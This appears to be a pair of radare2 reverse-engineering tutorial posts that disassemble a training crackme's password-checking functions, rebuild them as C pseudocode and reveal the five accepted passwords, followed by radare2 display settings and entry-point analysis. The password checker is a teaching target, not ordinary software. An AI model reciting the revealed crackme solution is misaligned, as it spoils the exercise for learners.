                     | (fcn) sym.checkPassword 153                   |
                     |   sym.checkPassword ();                       |
                     | ; var int local_18h @ rbp-0x18                |
                     | ; var int local_4h @ rbp-0x4                  |
                     | push rbp                                      |
                     | mov rbp, rsp                                  |
                     | sub rsp, 0x20                                 |
                     | mov qword [rbp - local_18h], rdi              |
                     | mov rax, qword [rbp - local_18h]              |
                     | mov rdx, qword [rax + section_end..shstrtab]  |
                     | mov rax, qword [rbp - local_18h]              |
                     | mov qword [rax + 0x110], rdx                  |
                     | jmp 0x4009ea ;[a]                             |
                           |  0x4009ea      |                 |
                           | mov rax, qword [rbp - local_18h] |
                           | mov rax, qword [rax + 0x110]     |
                           | mov rax, qword [rax]             |
                           | test rax, rax  |                 |
                           | jne 0x40098f ;[b]                |
                                 t f        |
        .------------------------' '--------|----------------------.
        |                                   |                      |
        |                                   |                      |
  =-----------------------------------=     |              =--------------------=
  |  0x40098f                         |     |              |  0x4009fd          |
  | mov rax, qword [rbp - local_18h]  |     |              | mov eax, 1         |
  | mov rdi, rax                      |     |              =--------------------=
  | call sym.readPassword ;[c]        |     |                  v
  | mov dword [rbp - local_4h], eax   |     |                  |
  | mov eax, dword [rbp - local_4h]   |     |                  |
  | movsxd rdx, eax                   |     |                  |
  | mov rax, qword [rbp - local_18h]  |     |                  |
  | mov rax, qword [rax + 0x110]      |     |                  |
  | mov rax, qword [rax]              |     |                  |
  | mov rcx, qword [rbp - local_18h]  |     |                  |
  | add rcx, 4                        |     |                  |
  | mov rsi, rax                      |     |                  '------.
  | mov rdi, rcx                      |     |                         |
  | call sym.imp.strncmp ;[d]         |     |                         |
  | test eax, eax                     |     |                         |
  | je 0x4009d0 ;[e]                  |     |                         |
  =-----------------------------------=     |                         |
          f t                               |                         |
        .-' '---------------------.         |                         |
        |                         |         |                         |
        |                         |         |                         |
=--------------------=      =-----------------------------------=     |
|  0x4009c9          |      |  0x4009d0     |                   |     |
| mov eax, 0         |      | mov rax, qword [rbp - local_18h]  |     |
| jmp 0x400a02 ;[f]  |      | mov rax, qword [rax + 0x110]      |     |
=--------------------=      | lea rdx, [rax + 8]                |     |
    v                       | mov rax, qword [rbp - local_18h]  |     |
    |                       | mov qword [rax + 0x110], rdx      |     |
    |                       =-----------------------------------=     |
    '----------------------------.----------'                         |
                             |  0x400a02          |
                             | leave              |
                             | ret                |

First of all, the pointer to the previously used structure is stored in the local variable local_18h. We’ll rename it
to a more meaningful name (afvn local_18h passwordStruct). Let’s also look into the function block by block (e.g. using the minimap mode of VV (remember from the last post?)).

    ; UNKNOWN XREF from 0x00400508 (unk)
    ; CALL XREF from 0x00400a51 (sym.main)
    0x0040096b      55             push rbp
    0x0040096c      4889e5         mov rbp, rsp
    0x0040096f      4883ec20       sub rsp, 0x20
    0x00400973      48897de8       mov qword [rbp - passwordStruct], rdi
    0x00400977      488b45e8       mov rax, qword [rbp - passwordStruct]
    0x0040097b      488b90080100.  mov rdx, qword [rax + section_end..shstrtab] ; [0x108:8]=0x288 LEA section_end..shstrtab ; section_end..shstrtab
    0x00400982      488b45e8       mov rax, qword [rbp - passwordStruct]
    0x00400986      488990100100.  mov qword [rax + 0x110], rdx
    0x0040098d      eb5b           jmp 0x4009ea

This block does only two things. First, it reserves space on the stack (0x20 or 32 bytes). Second, it stores some values based on the input struct. The input pointer is saved to our local variable at 0x400973; this address is afterwards loaded into rax to access its members (typical for structures). At 0x40097b the field at offset 0x108 is accessed (radare2 was a bit too eager when it tried to replace constants with flags). This means it reads the value of our field108 variable. The value is then stored into the field at offset 0x110 (field110). Sadly, the inline annotation of structure offsets is currently not implemented in radare2 (but is already planned for future releases).

int checkPassword(struct Foo *input) {
    // 0x00400973
    struct Foo* passwordStruct = input;
    // 0x00400977 - 0x00400986
    passwordStruct->field110 = passwordStruct->field108;

The following unconditional jump brings us to this small block:

    ; JMP XREF from 0x0040098d (sym.checkPassword)
    0x004009ea      488b45e8       mov rax, qword [rbp - passwordStruct]
    0x004009ee      488b80100100.  mov rax, qword [rax + 0x110]        ; [0x110:8]=0x290
    0x004009f5      488b00         mov rax, qword [rax]
    0x004009f8      4885c0         test rax, rax
    0x004009fb      7592           jne 0x40098f

This block simply checks whether the pointer in field110 itself points to a non-null pointer.

// 0x004009ea - 0x004009fb
if (*passwordStruct->field110) {

If the pointer is valid, it will jump to the largest block of this function:

    0x0040098f      488b45e8       mov rax, qword [rbp - passwordStruct]
    0x00400993      4889c7         mov rdi, rax
    0x00400996      e854ffffff     call sym.readPassword
    0x0040099b      8945fc         mov dword [rbp - local_4h], eax
    0x0040099e      8b45fc         mov eax, dword [rbp - local_4h]
    0x004009a1      4863d0         movsxd rdx, eax
    0x004009a4      488b45e8       mov rax, qword [rbp - passwordStruct]
    0x004009a8      488b80100100.  mov rax, qword [rax + 0x110]        ; [0x110:8]=0x290
    0x004009af      488b00         mov rax, qword [rax]
    0x004009b2      488b4de8       mov rcx, qword [rbp - passwordStruct]
    0x004009b6      4883c104       add rcx, 4
    0x004009ba      4889c6         mov rsi, rax
    0x004009bd      4889cf         mov rdi, rcx
    0x004009c0      e8abfdffff     call sym.imp.strncmp
    0x004009c5      85c0           test eax, eax
    0x004009c7      7407           je 0x4009d0

This block uses the pointer to the structure as an argument for the function readPassword. The result of this function (eax) is then stored into a local variable local_4h. This value is afterwards used for the following strncmp call (third argument, rdx). The first argument of this call is our currently unknown field (offset 4) of the structure; the second argument is the value that field110 points at.

A pseudo representation might look like the following:

// 0x0040098f - 0x0040099b
int x = readPassword(passwordStruct);
// 0x0040099e - 0x004009c7
if (!strncmp(passwordStruct->unknown, *passwordStruct->field110, x)) {

If the inputs are equal, the following block will be executed:

    0x004009d0      488b45e8       mov rax, qword [rbp - passwordStruct]
    0x004009d4      488b80100100.  mov rax, qword [rax + 0x110]        ; [0x110:8]=0x290
    0x004009db      488d5008       lea rdx, [rax + 8]                  ; 0x8
    0x004009df      488b45e8       mov rax, qword [rbp - passwordStruct]
    0x004009e3      488990100100.  mov qword [rax + 0x110], rdx

This is again a smaller block, which takes the value in field110, increments it by 8 (the size of one pointer on 64-bit systems) and stores it back.

// 0x004009d0 - 0x004009e3
passwordStruct->field110 = (char **)((char *)passwordStruct->field110 + 8);

As execution now starts over at 0x004009ea, we’ll continue with the case where the strings do not match.

    0x004009c9      b800000000     mov eax, 0
    0x004009ce      eb32           jmp 0x400a02

This is simple: it just sets eax to zero and jumps to the end of the function.

} else {
    // 0x004009c9 & 0x00400a02
    return 0;

The last block(s) represent the success case of the function:

    0x004009fd      b801000000     mov eax, 1
    ; JMP XREF from 0x004009ce (sym.checkPassword)
    0x00400a02      c9             leave
    0x00400a03      c3             ret

    // 0x004009fd - 0x00400a03
    return 1;

With some refactoring based on an overall look (jumping back to the zero check for example) we can represent the function as the following:

int checkPassword(struct Foo *input) {
    // 0x00400973
    struct Foo* passwordStruct = input;
    // 0x00400977 - 0x00400986
    passwordStruct->field110 = passwordStruct->field108;
    // 0x004009ea - 0x004009fb
    while (*passwordStruct->field110) {
        // 0x0040098f - 0x0040099b
        int x = readPassword(passwordStruct);
        // 0x0040099e - 0x004009c7
        if (!strncmp(passwordStruct->unknown, *passwordStruct->field110, x)) {
            // 0x004009d0 - 0x004009e3
            passwordStruct->field110 = (char **)((char *)passwordStruct->field110 + 8);
        } else {
            // 0x004009c9 & 0x00400a02
            return 0;
        }
    }
    // 0x004009fd - 0x00400a03
    return 1;
}
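
To make the control flow concrete, here is a minimal, self-contained sketch of the loop in C. Several things in it are assumptions and not taken from the binary: the struct layout is only guessed from the offsets 4, 0x108 and 0x110, readPasswordStub is a hypothetical stand-in that takes guesses from an array instead of the terminal, and the password list is made up.

```c
#include <stdio.h>
#include <string.h>

/* Layout guessed from the offsets seen in the disassembly (assumption). */
struct Foo {
    int    field0;
    char   unknown[260];
    char **field108;   /* start of a NULL-terminated list of strings */
    char **field110;   /* list entry that is currently being checked */
};

/* Hypothetical stand-in for readPassword: takes the next scripted guess
 * instead of prompting, and returns its length like the original seems to. */
static const char **next_guess;

static int readPasswordStub(struct Foo *foo) {
    strncpy(foo->unknown, *next_guess++, sizeof foo->unknown - 1);
    foo->unknown[sizeof foo->unknown - 1] = '\0';
    return (int)strlen(foo->unknown);
}

static int checkPasswordSketch(struct Foo *foo) {
    foo->field110 = foo->field108;          /* rewind to the list head */
    while (*foo->field110) {                /* stop at the NULL terminator */
        int n = readPasswordStub(foo);
        if (strncmp(foo->unknown, *foo->field110, (size_t)n) != 0)
            return 0;                       /* first mismatch fails */
        foo->field110++;                    /* advances by sizeof(char *) */
    }
    return 1;                               /* every entry matched */
}

/* Runs the sketch against a made-up list (not the challenge's passwords). */
static int run(const char **guesses) {
    static char *list[] = { "alpha", "beta", NULL };
    struct Foo foo = { 0 };
    foo.field108 = list;
    next_guess = guesses;
    return checkPasswordSketch(&foo);
}
```

Calling run with the guesses "alpha" and "beta" walks the whole list and returns 1, while a wrong second guess returns 0 as soon as the comparison fails.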

It seems there is still one function missing (readPassword):

/ (fcn) sym.readPassword 124
|   sym.readPassword ();
|           ; var int local_8h @ rbp-0x8
|           ; CALL XREF from 0x00400996 (sym.checkPassword)
|           0x004008ef      55             push rbp
|           0x004008f0      4889e5         mov rbp, rsp
|           0x004008f3      4883ec10       sub rsp, 0x10
|           0x004008f7      48897df8       mov qword [rbp - local_8h], rdi
|           0x004008fb      488b45f8       mov rax, qword [rbp - local_8h]
|           0x004008ff      488b80100100.  mov rax, qword [rax + 0x110] ; [0x110:8]=0x290
|           0x00400906      4889c2         mov rdx, rax
|           0x00400909      488b45f8       mov rax, qword [rbp - local_8h]
|           0x0040090d      488b80080100.  mov rax, qword [rax + section_end..shstrtab] ; [0x108:8]=0x288 LEA section_end..shstrtab ; section_end..shstrtab
|           0x00400914      4829c2         sub rdx, rax
|           0x00400917      4889d0         mov rax, rdx
|           0x0040091a      48c1f803       sar rax, 3
|           0x0040091e      4883c001       add rax, 1
|           0x00400922      4889c6         mov rsi, rax
|           0x00400925      bfcb0b4000     mov edi, str.Enter_Password_no.__d: ; "Enter Password no. %d: " @ 0x400bcb
|           0x0040092a      b800000000     mov eax, 0
|           0x0040092f      e86cfeffff     call sym.imp.printf
|           0x00400934      488b45f8       mov rax, qword [rbp - local_8h]
|           0x00400938      4883c004       add rax, 4
|           0x0040093c      4889c6         mov rsi, rax
|           0x0040093f      bfe30b4000     mov edi, str._255s          ; "%255s" @ 0x400be3
|           0x00400944      b800000000     mov eax, 0
|           0x00400949      e862feffff     call sym.imp.__isoc99_scanf
|           0x0040094e      488b45f8       mov rax, qword [rbp - local_8h]
|           0x00400952      c68003010000.  mov byte [rax + 0x103], 0
|           0x00400959      488b45f8       mov rax, qword [rbp - local_8h]
|           0x0040095d      4883c004       add rax, 4
|           0x00400961      4889c7         mov rdi, rax
|           0x00400964      e827feffff     call sym.imp.strlen
|           0x00400969      c9             leave
\           0x0040096a      c3             ret

This function has no jumps or internal function calls. The summary view (pdfs) shows which flags and calls are used by the function:

0x00400925 "Enter Password no. %d: "
0x0040092f call sym.imp.printf
0x0040093f "%255s"
0x00400949 call sym.imp.__isoc99_scanf
0x00400964 call sym.imp.strlen

Simply based on this output we could already guess what this function does:

int readPassword(struct Foo* foo) {
    printf("Enter Password no. %d: ");
    scanf("%255s");
    return strlen();
}

Obviously, this is not enough for us, as we want to know exactly what’s really going on. Let’s start with the part 0x004008ef-0x0040090d:

The first instructions represent again a typical function prologue. They reserve 0x10 bytes on the stack and store the input pointer into this buffer (local_8h). Afterwards, field110 is stored in rdx and field108 in rax.

int readPassword(struct Foo* foo) {
    // 0x004008ef-0x0040090d
    struct Foo* local_8h = foo;
    rdx = local_8h->field110;
    rax = local_8h->field108;

Part 0x00400914-0x0040091e consists of some mathematical instructions which can be translated into the following code snippet:

rax = rdx - rax
rax >>= 3
rax += 1

As we know, the rdx and rax registers contain pointers into a list of strings. We also know (based on the checkPassword function) that field110 is incremented during the processing, whilst field108 stays the same. This ultimately means that rdx - rax is the byte offset between the two list entries that field110 and field108 point at. The next instruction (rax >>= 3) shifts the value in rax (our offset) right by three positions. A right shift by one is equivalent to a division by two, so a shift by three is a division by eight. As we are dealing with 64-bit pointers, these two instructions simply calculate how many times the field110 pointer was moved forward. The final instruction increments the result by one, as (based on the following string) the current (one-based) position should be printed out.
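
The arithmetic can be sketched in C in two equivalent ways. This is only an illustration under the assumption of 8-byte pointers; the function names are made up and do not appear in the binary.

```c
#include <stdint.h>
#include <stddef.h>

/* Mirrors the three instructions: sub, sar 3, add 1.
 * Assumes cur >= head and 8-byte list entries. */
static long index_from_bytes(uintptr_t head, uintptr_t cur) {
    intptr_t byte_offset = (intptr_t)(cur - head);
    return (long)(byte_offset >> 3) + 1;
}

/* The same value via C pointer arithmetic: subtracting two char **
 * already yields a count of elements, so no explicit shift is needed. */
static long index_from_pointers(char **head, char **cur) {
    return (long)(cur - head) + 1;
}
```

With the current pointer two entries (16 bytes) past the head, both functions yield 3, which is the number that would be shown in the prompt.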

Together with the instructions 0x00400922-0x0040092f we get:

int readPassword(struct Foo* foo) {
    // 0x004008ef-0x0040092f
    struct Foo* local_8h = foo;
    printf("Enter Password no. %d: ", (int)(local_8h->field110 - local_8h->field108) + 1);

Part 0x00400934-0x00400952 represents a scanf call with the unknown field of the struct (offset 4) followed by an explicit zero byte at the end:

// 0x00400934-0x00400952
scanf("%255s", local_8h->unknown);
local_8h->unknown[0xff] = 0; // struct offset 0x103 minus the field offset 4

The end of the function simply returns the result of a strlen call with the input read by scanf.

int readPassword(struct Foo* foo) {
    // 0x004008ef-0x0040092f
    struct Foo* local_8h = foo;
    printf("Enter Password no. %d: ", (int)(local_8h->field110 - local_8h->field108) + 1);
    // 0x00400934-0x00400952
    scanf("%255s", local_8h->unknown);
    local_8h->unknown[255] = 0; // byte at struct offset 0x103
    // 0x00400959 - 0x0040096a
    return strlen(local_8h->unknown);
}
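
One consequence is worth a quick look: readPassword returns the length of what was typed, and checkPassword passes that value to strncmp as the length limit. The sketch below isolates that comparison rule. The helper name accepts is made up for illustration, and I have not verified this behaviour against the challenge binary itself; it only shows what the reconstructed pseudocode implies.

```c
#include <string.h>

/* Returns 1 when `input` would pass the reconstructed check against
 * `expected`: only the first strlen(input) characters are compared. */
static int accepts(const char *input, const char *expected) {
    size_t n = strlen(input);   /* length of the INPUT, not of the password */
    return strncmp(input, expected, n) == 0;
}
```

Under this rule, accepts("sec", "secret") is 1 because only three characters are compared, whereas accepts("secrets", "secret") is 0 because the seventh character is compared against the terminating zero byte of the expected string.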

As we have now reversed all functions, we can see that this time multiple passwords are required and that they are stored in an array at obj.passwords. We’ve also reversed the layout of the structure and (just for reference) can now rename the corresponding fields. This can be done either by editing the header file, by editing the database entries directly (tk) or by overwriting the definition inline:

"td struct Foo {int field0; char password[260]; char** passwordListHead; char** currentPasswordListEntry;};"

Note: the quotes around the command are required to ensure that the definition is parsed correctly. Also be aware that the offsets may be incorrectly parsed.
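
Since the offsets may be parsed incorrectly, it can help to let a C compiler confirm that the renamed definition really produces the offsets seen in the disassembly (4, 0x108 and 0x110). The following is a small sketch that assumes a typical x86-64 Linux target with 4-byte int and 8-byte pointers; on other targets the assertions are expected to fail.

```c
#include <stddef.h>

/* Same definition as passed to td above. */
struct Foo {
    int    field0;
    char   password[260];
    char **passwordListHead;
    char **currentPasswordListEntry;
};

/* Offsets used by the disassembly: add rax, 4 / [rax + 0x108] / [rax + 0x110] */
_Static_assert(offsetof(struct Foo, password) == 0x4,
               "password buffer expected at offset 4");
_Static_assert(offsetof(struct Foo, passwordListHead) == 0x108,
               "list head expected at offset 0x108");
_Static_assert(offsetof(struct Foo, currentPasswordListEntry) == 0x110,
               "current entry expected at offset 0x110");
```

The numbers line up because 4 + 260 = 264 = 0x108, which is already 8-byte aligned, so no padding is inserted before the first pointer.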

Let’s test the passwords:

$ ./challenge03
#          Challenge 3           #
#                                #
#      (c) 2016 Timo Schmid      #
Enter Password no. 1: shad7Pe
Enter Password no. 2: miTho7i
Enter Password no. 3: Wa3suac
Enter Password no. 4: ohGhah7
Enter Password no. 5: Aibah1a
Password accepted!

Challenge 0x04

You will find the next challenge here (linux64 dynamically linked, linux64 statically linked, win64):


MD5 (challenge04) = 215a8fa0a80c95082f8fb279ad7e5b9b
MD5 (challenge04.exe) = 016b96d38e914a96dca372b30d6d0949
MD5 (challenge04-static) = 87e67337a34fa8892bc2fc3c68c4db7d

SHA1 (challenge04) = 95a042b68c036c1d6b6698820589480be29a1437
SHA1 (challenge04.exe) = e4351d511c05666984c43d24cd4c338b3d715a66
SHA1 (challenge04-static) = 64d1ce0ae9a653860953faa87f88377fc0eda34b

SHA256 (challenge04) = 2829ef89135f9065c8b1122a13cde09df5d19768e25feb162a758ab168e1bfb4
SHA256 (challenge04.exe) = d63aa0768ba64eb5211a4f86c07b4b45b17e6125b79b24620f854c70aab401de
SHA256 (challenge04-static) = f723e4f44657484945501bf5ccdab2e7dd229db719f3568ad3cd88da382dccf9

The goal is again to find the correct password for the login into the binary. Next time, I’ll give you a walkthrough for the fourth challenge and challenge #5.

Happy reversing!

Reverse Engineering With Radare2 – Part 2

Welcome back to the radare2 reversing tutorials. If you’ve missed the previous parts, you can find them here and here.

Last time, we used the rabin2 application to view the strings found inside the challenge01 binary to find password candidates. Based on the results, we looked into the assembly to find the correct password. In this post, we’ll go through the next challenge and try out some of the features provided by radare2.

As recommended by the developers, I strongly suggest that you update your radare2 installation regularly, as it gets new features and bugfixes nearly every day.

Today, we’ll have a look into some of the visualization features of radare2.

First of all, you may have noticed that the radare2 output is rather colorful. If the current color scheme does not fit your needs, you have multiple options to modify it. Several configuration parameters exist under the scr configuration space. You can view the different settings by using e?scr:

          scr.atport: V@ starts a background http server and spawns an r2 -C
           scr.color: Enable colors
     scr.color.bytes: Colorize bytes that represent the opcodes of the instruction
       scr.color.ops: Colorize numbers and registers in opcodes
         scr.columns: Force console column count (width)
            scr.echo: Show rcons output in realtime to stderr and buffer
        scr.feedback: Set visual feedback level (1=arrow on jump, 2=every key (useful for videos))
           scr.fgets: Use fgets() instead of dietline for prompt input
     scr.fix_columns: Workaround for Prompt iOS SSH client
        scr.fix_rows: Workaround for Linux TTY
             scr.fps: Show FPS in Visual
       scr.highlight: Highlight that word at RCons level
        scr.histsave: Always save history on exit
            scr.html: Disassembly uses HTML syntax
     scr.interactive: Start in interactive mode
            scr.nkey: Select the seek mode in visual
            scr.null: Show no output
           scr.pager: Select pager program (when output overflows the window)
       scr.pipecolor: Enable colors when using pipes
          scr.prompt: Show user prompt (used by r2 -q)
      scr.promptfile: Show user prompt file (used by r2 -q)
      scr.promptflag: Show flag name in the prompt
      scr.promptsect: Show section name in the prompt
         scr.randpal: Random color palete or just get the next one from 'eco'
      scr.responsive: Auto-adjust Visual depending on screen (e.g. unset asm.bytes)
        scr.rgbcolor: Use RGB colors (not available on Windows)
            scr.rows: Force console row count (height) (duplicate?)
            scr.seek: Seek to the specified address on startup
             scr.tee: Pipe output to file of this name
       scr.truecolor: Manage color palette (0: ansi 16, 1: 256, 2: 16M)
            scr.utf8: Show UTF-8 characters instead of ANSI
           scr.wheel: Mouse wheel in Visual; temporaryly disable/reenable by right click/Enter)
       scr.wheelnkey: Use sn/sp and scr.nkey on wheel instead of scroll
      scr.wheelspeed: Mouse wheel speed

For example, if you have a terminal supporting UTF-8 characters, you might want to enable scr.utf8. By default, the output looks like this:


            ;-- main:
/ (fcn) sym.main 133
|           ; var int local_118h @ rbp-0x118
|           ; var int local_110h @ rbp-0x110
|           ; var int local_104h @ rbp-0x104
|           ; var int local_100h @ rbp-0x100
|           ; var int local_1h @ rbp-0x1
|           ; UNKNOWN XREF from 0x00400470 (unk)
|           ; DATA XREF from 0x0040073d (entry0)
|           0x004008e3      55             push rbp
|           0x004008e4      4889e5         mov rbp, rsp
|           0x004008e7      4881ec200100.  sub rsp, 0x120
|           0x004008ee      89bdfcfeffff   mov dword [rbp - local_104h], edi
|           0x004008f4      4889b5f0feff.  mov qword [rbp - local_110h], rsi
|           0x004008fb      488995e8feff.  mov qword [rbp - local_118h], rdx
|           0x00400902      b800000000     mov eax, 0
|           0x00400907      e80affffff     call sym.banner
|           0x0040090c      bf9d0a4000     mov edi, str.Enter_Password: ; "Enter Password: " @ 0x400a9d
|           0x00400911      b800000000     mov eax, 0
|           0x00400916      e8e5fdffff     call sym.imp.printf
|           0x0040091b      488d8500ffff.  lea rax, [rbp - local_100h]
|           0x00400922      4889c6         mov rsi, rax
|           0x00400925      bfae0a4000     mov edi, str._255s          ; "%255s" @ 0x400aae
|           0x0040092a      b800000000     mov eax, 0
|           0x0040092f      e8dcfdffff     call sym.imp.__isoc99_scanf
|           0x00400934      c645ff00       mov byte [rbp - local_1h], 0
|           0x00400938      488d8500ffff.  lea rax, [rbp - local_100h]
|           0x0040093f      4889c7         mov rdi, rax
|           0x00400942      e808ffffff     call sym.checkPassword
|           0x00400947      84c0           test al, al
|       ,=< 0x00400949      740c           je 0x400957
|       |   0x0040094b      bfb40a4000     mov edi, str.Password_accepted_ ; "Password accepted!" @ 0x400ab4
|       |   0x00400950      e88bfdffff     call sym.imp.puts
|      ,==< 0x00400955      eb0a           jmp 0x400961
|      |`-> 0x00400957      bfc70a4000     mov edi, str.Wrong_         ; "Wrong!" @ 0x400ac7
|      |    0x0040095c      e87ffdffff     call sym.imp.puts
|      |    ; JMP XREF from 0x00400955 (sym.main)
|      `--> 0x00400961      b800000000     mov eax, 0
|           0x00400966      c9             leave
\           0x00400967      c3             ret


After e scr.utf8=true:

            ;-- main:
╒ (fcn) sym.main 133
│           ; var int local_118h @ rbp-0x118
│           ; var int local_110h @ rbp-0x110
│           ; var int local_104h @ rbp-0x104
│           ; var int local_100h @ rbp-0x100
│           ; var int local_1h @ rbp-0x1
│           ; UNKNOWN XREF from 0x00400470 (unk)
│           ; DATA XREF from 0x0040073d (entry0)
│           0x004008e3      55             push rbp
│           0x004008e4      4889e5         mov rbp, rsp
│           0x004008e7      4881ec200100.  sub rsp, 0x120
│           0x004008ee      89bdfcfeffff   mov dword [rbp - local_104h], edi
│           0x004008f4      4889b5f0feff.  mov qword [rbp - local_110h], rsi
│           0x004008fb      488995e8feff.  mov qword [rbp - local_118h], rdx
│           0x00400902      b800000000     mov eax, 0
│           0x00400907      e80affffff     call sym.banner
│           0x0040090c      bf9d0a4000     mov edi, str.Enter_Password: ; "Enter Password: " @ 0x400a9d
│           0x00400911      b800000000     mov eax, 0
│           0x00400916      e8e5fdffff     call sym.imp.printf
│           0x0040091b      488d8500ffff.  lea rax, [rbp - local_100h]
│           0x00400922      4889c6         mov rsi, rax
│           0x00400925      bfae0a4000     mov edi, str._255s          ; "%255s" @ 0x400aae
│           0x0040092a      b800000000     mov eax, 0
│           0x0040092f      e8dcfdffff     call sym.imp.__isoc99_scanf
│           0x00400934      c645ff00       mov byte [rbp - local_1h], 0
│           0x00400938      488d8500ffff.  lea rax, [rbp - local_100h]
│           0x0040093f      4889c7         mov rdi, rax
│           0x00400942      e808ffffff     call sym.checkPassword
│           0x00400947      84c0           test al, al
│       ┌─< 0x00400949      740c           je 0x400957
│       │   0x0040094b      bfb40a4000     mov edi, str.Password_accepted_ ; "Password accepted!" @ 0x400ab4
│       │   0x00400950      e88bfdffff     call sym.imp.puts
│      ┌──< 0x00400955      eb0a           jmp 0x400961
│      │└─> 0x00400957      bfc70a4000     mov edi, str.Wrong_         ; "Wrong!" @ 0x400ac7
│      │    0x0040095c      e87ffdffff     call sym.imp.puts
│      │    ; JMP XREF from 0x00400955 (sym.main)
│      └──> 0x00400961      b800000000     mov eax, 0
│           0x00400966      c9             leave
╘           0x00400967      c3             ret


Currently, it mainly affects the ASCII arrows drawn on the left-hand side of the disassembly. Of course, you can also disable the coloring by executing e scr.color = false (entirely), e scr.color.bytes = false (only the bytes in the disassembly) or e scr.color.ops = false (only the opcodes). If you like colors, but not the current scheme, you can choose another one by using the ec commands. One option is to choose one of the predefined themes, for example eco solarized:

            ;-- main:
╒ (fcn) sym.main 133
│           ; var int local_118h @ rbp-0x118
│           ; var int local_110h @ rbp-0x110
│           ; var int local_104h @ rbp-0x104
│           ; var int local_100h @ rbp-0x100
│           ; var int local_1h @ rbp-0x1
│           ; UNKNOWN XREF from 0x00400470 (unk)
│           ; DATA XREF from 0x0040073d (entry0)
│           0x004008e3      55             push rbp
│           0x004008e4      4889e5         mov rbp, rsp
│           0x004008e7      4881ec200100.  sub rsp, 0x120
│           0x004008ee      89bdfcfeffff   mov dword [rbp - local_104h], edi
│           0x004008f4      4889b5f0feff.  mov qword [rbp - local_110h], rsi
│           0x004008fb      488995e8feff.  mov qword [rbp - local_118h], rdx
│           0x00400902      b800000000     mov eax, 0
│           0x00400907      e80affffff     call sym.banner
│           0x0040090c      bf9d0a4000     mov edi, str.Enter_Password: ; "Enter Password: " @ 0x400a9d
│           0x00400911      b800000000     mov eax, 0
│           0x00400916      e8e5fdffff     call sym.imp.printf
│           0x0040091b      488d8500ffff.  lea rax, [rbp - local_100h]
│           0x00400922      4889c6         mov rsi, rax
│           0x00400925      bfae0a4000     mov edi, str._255s          ; "%255s" @ 0x400aae
│           0x0040092a      b800000000     mov eax, 0
│           0x0040092f      e8dcfdffff     call sym.imp.__isoc99_scanf
│           0x00400934      c645ff00       mov byte [rbp - local_1h], 0
│           0x00400938      488d8500ffff.  lea rax, [rbp - local_100h]
│           0x0040093f      4889c7         mov rdi, rax
│           0x00400942      e808ffffff     call sym.checkPassword
│           0x00400947      84c0           test al, al
│       ┌─< 0x00400949      740c           je 0x400957
│       │   0x0040094b      bfb40a4000     mov edi, str.Password_accepted_ ; "Password accepted!" @ 0x400ab4
│       │   0x00400950      e88bfdffff     call sym.imp.puts
│      ┌──< 0x00400955      eb0a           jmp 0x400961
│      │└─> 0x00400957      bfc70a4000     mov edi, str.Wrong_         ; "Wrong!" @ 0x400ac7
│      │    0x0040095c      e87ffdffff     call sym.imp.puts
│      │    ; JMP XREF from 0x00400955 (sym.main)
│      └──> 0x00400961      b800000000     mov eax, 0
│           0x00400966      c9             leave
╘           0x00400967      c3             ret

(Use eco without any parameters for a complete list.) If this does not fit your needs, you could also use random colors (ecr) or set the colors yourself: ec gives a list of all available keys, and ec <key> <frontcolor> (<backcolor>) sets one of them, e.g. ec comment rgb:ffff00 blue (use ecs for supported colors).

Besides the coloring, you’ll find various settings which affect the output of the disassembly in the asm configuration space. They allow you, for example, to customize the spacing between the different parts of the disassembly (flow arrows, bytes, addresses, opcodes, comments,…) and to turn them on and off.

After you have found some pleasing settings, let’s start with the current binary (btw, you can store option commands in the $HOME/.radare2rc file for persistence). After loading the binary into radare2 (r2 -AA ./challenge02), you should find yourself at the address 0x00400720. In case some of you are wondering why we are placed here and not at the main function, we’ll use different ways to get a clue. Assuming that we are currently placed inside or at the beginning of a function, we can use the afi command to get some information about that function:

[0x00400720]> afi
 offset: 0x00400720
 name: entry0
 size: 43
 realsz: 43
 stackframe: 0
 call-convention: @�adAV
 cyclomatic-complexity: 1
 bits: 64
 type: fcn [NEW]
 num-bbs: 1
 edges: 0
 end-bbs: 1
 data-refs: 0x004009e0 0x00400970 0x004008e3 0x00600ff0 
 args: 0
 diff: type: new


As you may notice, among other information, we get the name of the current function, which is entry0. This strongly indicates that we are currently placed at the entrypoint of the application, which typically sets some things up (like parsing the commandline, retrieving environment variables etc.) and calls the actual main function afterwards. To check this assumption, we’ll use the ie command to get the address of the entry point as specified in the file headers (elf64 in this case):

[0x00400720]> ie
vaddr=0x00400720 paddr=0x00000720 baddr=0x00400000 laddr=0x00000000 type=program

1 entrypoints


As you can see, the vaddr (virtual address) is matching the current position, so we are actually placed at the beginning of the entry point function.

Sidenote: the virtual address is most of the time the sum of the physical address (paddr; position in the binary) and the base address (baddr).
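
As a quick check of that rule with the numbers from the ie output, here is a tiny C sketch (the function name vaddr_guess is made up). It also shows why the sidenote says "most of the time": for the .got entry that radare2 reports for this binary (vaddr=0x00600ff0 paddr=0x00000ff0), the simple rule does not give the reported virtual address.

```c
#include <stdint.h>

/* Simple rule from the sidenote: virtual address = base address + file offset. */
static uint64_t vaddr_guess(uint64_t baddr, uint64_t paddr) {
    return baddr + paddr;
}
```

For the entry point, vaddr_guess(0x00400000, 0x720) gives 0x00400720 as reported. For the .got entry, it gives 0x00400ff0 instead of 0x00600ff0, so that part of the file is evidently mapped at a different virtual address than the rule predicts.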


Let’s take a look at the disassembly of this function:


            ;-- section_end..plt:
            ;-- section..text:
            ;-- _start:
╒ (fcn) entry0 43
│           ; UNKNOWN XREF from 0x00400440 (unk)
│           0x00400720      31ed           xor ebp, ebp                ; [13] va=0x00400720 pa=0x00000720 sz=706 vsz=706 rwx=--r-x .text
│           0x00400722      4989d1         mov r9, rdx
│           0x00400725      5e             pop rsi
│           0x00400726      4889e2         mov rdx, rsp
│           0x00400729      4883e4f0       and rsp, 0xfffffffffffffff0
│           0x0040072d      50             push rax
│           0x0040072e      54             push rsp
│           0x0040072f      49c7c0e00940.  mov r8, sym.__libc_csu_fini ; sym.__libc_csu_fini
│           0x00400736      48c7c1700940.  mov rcx, sym.__libc_csu_init ; "AWAVA..AUATL.%.. " @ 0x400970
│           0x0040073d      48c7c7e30840.  mov rdi, sym.main           ; "UH..H.. ." @ 0x4008e3
│           0x00400744      ff15a6082000   call qword [rip + 0x2008a6] ; [0x600ff0:8]=0 LEA reloc.__libc_start_main_240 ; reloc.__libc_start_main_240
╘           0x0040074a      f4             hlt


